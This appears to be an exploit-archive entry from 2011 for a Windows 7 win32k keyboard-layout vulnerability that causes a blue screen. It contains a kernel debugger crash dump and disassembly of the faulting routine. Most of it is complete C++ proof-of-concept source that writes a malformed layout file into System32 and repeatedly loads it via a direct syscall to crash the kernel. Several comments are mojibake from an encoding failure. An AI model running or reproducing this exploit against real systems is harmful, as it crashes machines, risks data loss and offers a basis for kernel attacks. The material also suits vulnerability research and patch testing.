[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : win7 keylayout Blue Screen Vulnerability
# Published : 2011-11-21
# Author :
# Previous Title : NCSS <= 07.1.21 Array Overflow with Write2
# Next Title : Mac OS X < 10.6.7 Kernel Panic Exploit
Crash:
/*
win7
Access violation - code c0000005 (!!! second chance !!!)
win32k!ReadLayoutFile+0x62:
9566d591 8b4834 mov ecx,dword ptr [eax+34h]
kd> r
eax=ffffffe8 ebx=00000000 ecx=fe978b2e edx=000000e0 esi=fe4e0168 edi=00000000
eip=9566d591 esp=985ad8a0 ebp=985ad8bc iopl=0 nv up ei pl nz ac pe cy
cs=0008 ss=0010 ds=0023 es=0023 fs=0030 gs=0000 efl=00010217
win32k!ReadLayoutFile+0x62:
9566d591 8b4834 mov ecx,dword ptr [eax+34h] ds:0023:0000001c=????????
kd> kb
ChildEBP RetAddr Args to Child
985acf5c 83d1b083 00000003 bc9827e2 00000065 nt!RtlpBreakWithStatusInstruction
985acfac 83d1bb81 00000003 985ad3b0 00000000 nt!KiBugCheckDebugBreak+0x1c
985ad370 83d1af20 0000008e c0000005 9566d591 nt!KeBugCheck2+0x68b
985ad394 83cf108c 0000008e c0000005 9566d591 nt!KeBugCheckEx+0x1e
985ad7bc 83c7add6 985ad7d8 00000000 985ad82c nt!KiDispatchException+0x1ac
985ad824 83c7ad8a 985ad8bc 9566d591 badb0d00 nt!CommonDispatchException+0x4a
985ad8bc 9566dc6a fe4e0168 80000984 00000160 nt!Kei386EoiHelper+0x192
985ad8dc 95669b7b 80000984 00000160 000001ae win32k!LoadKeyboardLayoutFile+0x70
985ad968 9567c21e 883bf4b0 80000984 08040804 win32k!xxxLoadKeyboardLayoutEx+0x1be
985ad9a4 9566a275 883bf4b0 80000984 08040804 win32k!xxxSafeLoadKeyboardLayoutEx+0x93
985add0c 83c7a1ea 00000038 00000160 000001ae win32k!NtUserLoadKeyboardLayoutEx+0x119
985add0c 777970b4 00000038 00000160 000001ae nt!KiFastCallEntry+0x12a
001ff470 0111c58c 0111c76a 00000038 00000160 ntdll!KiFastSystemCallRet
WARNING: Stack unwind information not available. Following frames may be wrong.
001ff9f8 0111c956 00000000 00000000 7ffd9000 ms10_73+0x2c58c
Details¡êo
WIN7
.text:BF80D538 push eax ; int
.text:BF80D539 push 40000h ; int
.text:BF80D53E push 40h ; int
.text:BF80D540 push [ebp+start_buffer] ; FileHandle
.text:BF80D543 mov [ebp+plength], ebx
.text:BF80D546 mov [ebp+ppbuffer], ebx
.text:BF80D549 mov [ebp+var_10], ebx
.text:BF80D54C call _LoadFileContent@20 ; LoadFileContent(x,x,x,x,x)
.text:BF80D551 test eax, eax
.text:BF80D553 jl loc_BF80D6F1
.text:BF80D559 mov ecx, [ebp+ppbuffer] 11?¨¬??¦Ì??¡¤+3ch¡ä|¦Ì?dword =0xffffffxx ?¡ä?¨¦¨¨?1y?¨¬2a¡ê?¦Ì???BSOD
.text:BF80D55C mov eax, [ecx+3Ch] //D¨¨¨°a2?2a??¦Ì?¦Ì??¡¤
.text:BF80D55F add eax, ecx
.text:BF80D561 cmp eax, ecx
.text:BF80D563 jb loc_BF80D6F1
.text:BF80D569 mov ecx, [ebp+plength]
.text:BF80D56C mov edx, [ebp+ppbuffer]
.text:BF80D56F add ecx, edx
.text:BF80D571 lea edx, [eax+0F8h]
.text:BF80D577 mov [ebp+plength], ecx
.text:BF80D57A cmp edx, ecx
.text:BF80D57C jnb loc_BF80D6F1
.text:BF80D582 mov ecx, [eax+34h] ----->crash
winxp
.text:BF8821D7 push eax ; ViewSize
.text:BF8821D8 push esi ; SectionOffset
.text:BF8821D9 push esi ; CommitSize
.text:BF8821DA push esi ; ZeroBits
.text:BF8821DB lea eax, [ebp+BaseAddress]
.text:BF8821DE push eax ; BaseAddress
.text:BF8821DF push 0FFFFFFFFh ; ProcessHandle
.text:BF8821E1 push [ebp+Handle] ; SectionHandle
.text:BF8821E4 call ds:__imp__ZwMapViewOfSection@40 ; ZwMapViewOfSection(x,x,x,x,x,x,x,x,x,x)
.text:BF8821EA test eax, eax
.text:BF8821EC jl loc_BF88238A
.text:BF8821F2 mov ecx, [ebp+BaseAddress]
.text:BF8821F5 mov eax, [ecx+3Ch]
.text:BF8821F8 add eax, ecx
.text:BF8821FA movzx edx, word ptr [eax+6] -----?¦Ìcrash
// poc.cpp : ?¡§¨°?????¨¬¡§¨®|¨®?3¨¬D¨°¦Ì?¨¨??¨²¦Ì??¡ê
//
#include "stdafx.h"
#include <windows.h>
#include <stdio.h>
#include <ntsecapi.h>
#pragma comment(lib,"User32.lib")
#define MAGIC_OFFSET 0x6261
#define WIN7 1
#define InitializeUnicodeStr(p,s) {
(p)->Length= wcslen(s)*2;
(p)->MaximumLength = wcslen(s)*2+2;
(p)->Buffer = s;
}
#if WIN7
_declspec(naked) HKL __stdcall NtUserLoadKeyboardLayoutEx
(
IN HANDLE Handle,
IN DWORD offTablelow,
IN DWORD offTableHigh,
IN PUNICODE_STRING puszKeyboardName,
IN HKL hKL,
IN PUNICODE_STRING puszKLID,
IN DWORD dwKLID,
IN UINT Flags
)
{
__asm
{
mov eax,11E3h
mov edx, 7ffe0300h
call dword ptr [edx]
ret 20h
}
}
#else
_declspec(naked) HKL __stdcall NtUserLoadKeyboardLayoutEx
(
IN HANDLE Handle,
IN DWORD offTable,
IN PUNICODE_STRING puszKeyboardName,
IN HKL hKL,
IN PUNICODE_STRING puszKLID,
IN DWORD dwKLID,
IN UINT Flags
)
{
__asm
{
mov eax, 000011c6h
mov edx, 7ffe0300h
call dword ptr [edx]
retn 1Ch
}
}
#endif
unsigned char fakeDll2[]="x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x35x44x01"//0x40 00 00 00 base=fdbbca98 fdbbca00 02443500
"x00x00x00x00x00x00x01x00x00x00x00x00x00x00x00x00"//
"x00x00x00x00xE0x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x2Ex64x61x74x61x00x00x00"
"xE6x00x00x00x60x01x00x00xE6x00x00x00x60x01x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"xFFxFFx00x00x9Ex01x00x00x00x00x00x00x00x00x00x00"//crash?? 94 10
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"xA6x01x00x00xAAx01x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x9Cx01x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x01x00x00x00xC2x01x00x00x00x00x00x00x00x00"
"x00x00x00x06x00x00x00x00x00x00x00x00x00x00x00x00"//index
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00";
;
UNICODE_STRING uStr;
UNICODE_STRING uKerbordname;
VOID boom_loadlayout()
{
KEYBDINPUT kb={0};
INPUT vInput={0};
HANDLE hFile;
DWORD dwFuckS0ny;
HKL hKbd;
WCHAR lpPath[MAX_PATH]={0};
WCHAR lpLayoutFile[MAX_PATH]={L"C:\Windows\System32\lSp0wns.boom111"};
LPVOID lpShellPtr;
//strcpy( lpLayoutFile, L"%lSp0wns.boom111", lpPath);
hFile = CreateFileW(lpLayoutFile,
GENERIC_READ|GENERIC_WRITE,
FILE_SHARE_READ|FILE_SHARE_WRITE,
0,
CREATE_ALWAYS,
0,0);
if( hFile == INVALID_HANDLE_VALUE )
{
printf(" n[!!] Error:errorcode:%xn",GetLastError());
exit(0);
}
WriteFile( hFile,
fakeDll2,
sizeof(fakeDll2)-1,
&dwFuckS0ny,
NULL);
//printf("n[+] Writing malformed kbd layout file nt"%S"nt[ %d ] bytes writtenn",lpLayoutFile,dwFuckS0ny);
CloseHandle(hFile);
hFile = CreateFileW (lpLayoutFile,
GENERIC_READ,
FILE_SHARE_READ,
0,
OPEN_EXISTING,
0,0);
if( hFile == INVALID_HANDLE_VALUE )
{
printf(" n[!!] Errorn");
exit(0);
}
hKbd = GetKeyboardLayout( GetWindowThreadProcessId( GetForegroundWindow(), &dwFuckS0ny ) );
printf("n[+] Loading it...[ 0x%x ]n", NtUserLoadKeyboardLayoutEx( hFile, 0x0160,0x01AE,&uKerbordname, hKbd, &uStr, 0x666, 0x101 ) );// 0x101
/*HKL NTAPI NtUserLoadKeyboardLayoutEx ( IN HANDLE Handle,
IN DWORD offTable,
IN PUNICODE_STRING puszKeyboardName,
IN HKL hKL,
IN PUNICODE_STRING puszKLID,
IN DWORD dwKLID,
IN UINT Flags
) */
//win7?????a??o¡¥¨ºy¨º???2?¨ºy¨¤¡ä???DoffTable2e¡¤?3¨¦??
//???t¨°??¡§¨°a¡¤??¨²system32????????2?¨¨?¡ä£¤¡¤¡é2?¨¢?
CloseHandle(hFile);
//printf("n[+] Donen");
}
int _tmain(int argc, _TCHAR* argv[])
{
LoadLibraryA("user32.dll");
InitializeUnicodeStr(&uStr,L"p3d.dll");//???¨²¡À?D?D?¨®¨²3¡è?¨¨
//fix by instruder
InitializeUnicodeStr(&uKerbordname,L"A");
uKerbordname.MaximumLength=0;
for (int j=0;j<=2;j++)
{
for (int i1=0;i1<=0xff;i1++)
{
for (int i2=0;i2<0xff;i2++)
{
printf("%x,%xn",i1,i2);
fakeDll2[0x3d]=i1;
fakeDll2[0x3e]=i2;
fakeDll2[0x3f]=j;
boom_loadlayout();
}
}
}
return 0;
}//